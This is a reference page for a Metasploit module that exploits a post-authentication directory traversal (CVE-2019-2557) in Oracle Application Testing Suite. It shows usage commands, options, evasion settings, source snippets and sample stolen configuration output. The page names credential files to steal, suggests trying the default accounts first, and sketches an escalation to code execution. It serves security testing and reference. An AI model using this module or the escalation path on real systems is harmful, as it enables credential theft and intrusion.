Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/gather/oats_downloadservlet_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal
Module: auxiliary/gather/oats_downloadservlet_traversal
Source code: modules/auxiliary/gather/oats_downloadservlet_traversal.rb
Disclosure date: 2019-04-16
Last modification time: 2019-05-23 12:35:45 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8088, 8443, 8880, 8888
List of CVEs: CVE-2019-2557

This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load Testing interface, a remote user can abuse the custom report template selector, and cause the DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application contains multiple configuration files that include encrypted credentials, and that there are public resources for decryption, it is actually possible to gain remote code execution by leveraging this directory traversal attack. Please note that authentication is required. By default, OATS has two built-in accounts: default and administrator. You could try to target those first.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/oats_downloadservlet_traversal
msf auxiliary(oats_downloadservlet_traversal) > show targets
    ... a list of targets ...
msf auxiliary(oats_downloadservlet_traversal) > set TARGET target-id
msf auxiliary(oats_downloadservlet_traversal) > show options
    ... show and set options ...
msf auxiliary(oats_downloadservlet_traversal) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • OATSPASSWORD: The password to use for Oracle

Knowledge Base


Description


Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.

In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.

This vulnerability is also known as CVE-2019-2557.

Vulnerable Application


The following is the exact setup I used to test and analyze the vulnerability:

  • Windows Server 2008 R2 x64 (other Windows systems are also supported)
    • .Net Framework 3.5 enabled (from add/remove features)
    • IE ESC (from Server Manager) disabled
    • 8GB of RAM (at least more than 4GB will be used to run OATS)
    • Duel-Core processor
  • oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
  • Jdk-7u21-windows-x64.exe
  • OracleXE112_Win64.zip (Newer version 18c did not work well for me)
  • Firefox (I had to install this because IE on Win2k8 is completely outdated)
  • Adobe Flash installed (IE ESC needs to be disabled in order to install this)

For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.

Notes


By default, your starting traversal path is:

C:\OracleATS\config\Report Templates\

There are some interesting files you can steal from this directory, such as:

  • oats-config.xml
  • oats-database-config.xml
  • oats-keystore

Code execution is possible leveraging from this vulnerability if you target these files:

  • C:\OracleATS\oats\servers\AdminServer\security\SerializedSystemIni.dat
  • C:\OracleATS\oats\servers\AdminServer\security\boot.properties

After that, you can find a third party script to decrypt the credentials, and then you could gain code execution from the administrator console.

Credit


Special thanks to Steven Seeley to assist on the development of the Metasploit module.

Scenarios


msf5 auxiliary(gather/oats_downloadservlet_traversal) > run
[*] Running module against 172.16.249.143

<xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">

oats-agent
eYAdfLaDkdBlUmflYhpg+CHGeXc=
oats
{AES}WNdIPXpoeoZzyDNuJPm0wU4R3YKc1SUR2k5+TbQfzIQ=
oats
http://localhost:8088
9.1.0
{AES}NHrwlbPc7Arlb7puj+UlzAAXB/dUEbv3bdwNnee1/sc=
{AES}WMTjMmLChdB9CTSrnyJ33113u0ml0juuGZQCWPODJTk=
t3://localhost:8088
/tmp
t3://localhost:8088


[*] Auxiliary module execution completed
msf5 auxiliary(gather/oats_downloadservlet_traversal) > 

Go back to menu.

Msfconsole Usage


Here is how the gather/oats_downloadservlet_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/oats_downloadservlet_traversal

msf6 auxiliary(gather/oats_downloadservlet_traversal) > show info

       Name: Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal
     Module: auxiliary/gather/oats_downloadservlet_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-04-16

Provided by:
  Steven Seeley
  sinn3r <[email protected]>

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  DEPTH         1                yes       The max traversal depth
  FILE          oats-config.xml  yes       The name of the file to download
  OATSPASSWORD                   yes       The password to use for Oracle
  OATSUSERNAME  default          yes       The username to use for Oracle
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         8088             yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                          no        HTTP server virtual host

Description:
  This module exploits a vulnerability in Oracle Application Testing 
  Suite (OATS). In the Load Testing interface, a remote user can abuse 
  the custom report template selector, and cause the DownloadServlet 
  class to read any file on the server as SYSTEM. Since the Oracle 
  application contains multiple configuration files that include 
  encrypted credentials, and that there are public resources for 
  decryption, it is actually possible to gain remote code execution by 
  leveraging this directory traversal attack. Please note that 
  authentication is required. By default, OATS has two built-in 
  accounts: default and administrator. You could try to target those 
  first.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-2557
  https://srcincite.io/advisories/src-2019-0033/
  https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

Module Options


This is a complete list of options available in the gather/oats_downloadservlet_traversal auxiliary module:

msf6 auxiliary(gather/oats_downloadservlet_traversal) > show options

Module options (auxiliary/gather/oats_downloadservlet_traversal):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DEPTH         1                yes       The max traversal depth
   FILE          oats-config.xml  yes       The name of the file to download
   OATSPASSWORD                   yes       The password to use for Oracle
   OATSUSERNAME  default          yes       The username to use for Oracle
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         8088             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/oats_downloadservlet_traversal auxiliary module:

msf6 auxiliary(gather/oats_downloadservlet_traversal) > show advanced

Module advanced options (auxiliary/gather/oats_downloadservlet_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/oats_downloadservlet_traversal module can do:

msf6 auxiliary(gather/oats_downloadservlet_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/oats_downloadservlet_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/oats_downloadservlet_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

117:	    res = send_request_cgi({
118:	      'method' => 'GET',
119:	      'uri'    => uri,
120:	    })
121:	
122:	    fail_with(Failure::Unknown, 'No response from server') unless res
123:	    cookies = res.get_cookies
124:	    session_id = cookies.scan(/JSESSIONID=(.+);/i).flatten.first || ''
125:	    auth_spec.session_id = session_id
126:	    load_runloopback_args(res)
127:	  end

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

143:	        {
144:	          'Upgrade-Insecure-Requests' => '1'
145:	        }
146:	    })
147:	
148:	    fail_with(Failure::Unknown, 'No response from server') unless res
149:	    hidden_inputs = res.get_hidden_inputs.first
150:	    auth_spec.form_value = hidden_inputs['org.apache.myfaces.trinidad.faces.FORM']
151:	    auth_spec.view_state = hidden_inputs['javax.faces.ViewState']
152:	  end
153:	

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

173:	          'event' => 'btnSubmit',
174:	          'event.btnSubmit' => '<m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>'
175:	        }
176:	    })
177:	
178:	    fail_with(Failure::Unknown, 'No response from server') unless res
179:	    if res.body.include?('Login failed')
180:	      fail_with(Failure::NoAccess, 'Login failed')
181:	    else
182:	      store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
183:	      load_view_redirect_value(res)

Login failed


Here is a relevant code snippet related to the "Login failed" error message:

175:	        }
176:	    })
177:	
178:	    fail_with(Failure::Unknown, 'No response from server') unless res
179:	    if res.body.include?('Login failed')
180:	      fail_with(Failure::NoAccess, 'Login failed')
181:	    else
182:	      store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
183:	      load_view_redirect_value(res)
184:	    end
185:	  end

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

201:	        {
202:	          'Upgrade-Insecure-Requests' => '1'
203:	        }
204:	    })
205:	
206:	    fail_with(Failure::Unknown, 'No response from server') unless res
207:	    fail_with(Failure::Unknown, 'File not found') if res.body.include?('No content to display')
208:	    res.body
209:	  end
210:	
211:	  def run

No content to display


Here is a relevant code snippet related to the "No content to display" error message:

202:	          'Upgrade-Insecure-Requests' => '1'
203:	        }
204:	    })
205:	
206:	    fail_with(Failure::Unknown, 'No response from server') unless res
207:	    fail_with(Failure::Unknown, 'File not found') if res.body.include?('No content to display')
208:	    res.body
209:	  end
210:	
211:	  def run
212:	    ota_login!

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Steven Seeley
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.